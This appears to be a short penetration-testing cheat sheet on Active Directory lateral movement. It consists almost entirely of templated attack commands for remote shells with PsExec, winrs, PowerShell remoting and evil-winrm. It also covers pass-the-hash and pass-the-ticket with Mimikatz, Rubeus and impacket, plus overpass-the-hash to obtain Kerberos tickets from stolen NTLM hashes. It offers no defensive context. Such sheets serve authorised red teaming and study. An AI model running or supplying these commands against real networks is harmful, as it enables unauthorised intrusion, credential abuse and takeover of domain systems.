Neko

Further Active Directory Access

What to do once you have a password, hash, or ticket.

Last updated: May 4th, 2023

Unrestricted Access

winrs -r:{HOSTNAME} cmd

.\PsExec.exe \\{HOSTNAME} cmd

$sess = New-PSSession -ComputerName {HOST}
Enter-PSSession -Session $sess

$sess = New-PSSession -ComputerName {HOST}
Invoke-Command -Session $sess -ScriptBlock {ipconfig;whoami;pwd}

Invoke-WSManWinRM -hostname {HOST} -command cmd

With a Password (PTP)

winrs -r:{HOST} -u:{DOMAIN}\{USER} -p:{PASS} cmd
.\PsExec.exe -u {DOMAIN}\{USER} -p {PASS} \\{HOSTNAME} cmd
impacket-psexec {DOMAIN}/{USER}:{PASS}@{IP}
Invoke-WSManWinRM -hostname {HOST} -command cmd -user {DOMAIN}\{USER} -password {PASS}
evil-winrm -i {IP} -u '{DOMAIN}\{USER}' -p '{PASS}'
rdesktop -a 16 {IP} -d {DOMAIN} -u {USER} -p {PASS}
xfreerdp /v:{IP} /d:{DOMAIN} /u:"{USER}" /p:{PASS}

With a Hash (PTH)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:{USER} /domain:{DOMAIN} /ntlm:{NTLM} /run:powershell.exe"'
impacket-psexec -hashes ":{NTLM}" {DOMAIN}/{USER}@{IP}
evil-winrm -i {IP} -u {USER} -H {NTLM}
pth-winexe -U '{DOMAIN}/{USER}%{LM}:{NTLM}' //{IP} cmd

With a Ticket (PTT)

Invoke-Mimikatz -Command '"kerberos::ptt {TICKET}.kirbi"'
Rubeus.exe ptt /ticket:{TICKET}

.\PsExec.exe -accepteula \\{HOSTNAME} cmd
winrs -r:{HOSTNAME} cmd

OverPass the Hash (PTK)

Rubeus.exe asktgt /user:{USER} /rc4:{NTLM} /ptt
.\PsExec.exe -accepteula \\{HOSTNAME} cmd
winrs -r:{HOSTNAME} cmd

Invoke-Mimikatz -Command '"sekurlsa::pth /user:{USER} /domain:{DOMAIN} /aes256:{AES256_KEY} /run:cmd.exe"'

1- impacket-getTGT {DOMAIN}/{USER} -hashes ":{NTLM}"
2- export KRB5CCNAME=$(pwd)/{USER}.ccache
3- impacket-psexec {DOMAIN}/{USER}@{HOSTNAME} -k -no-pass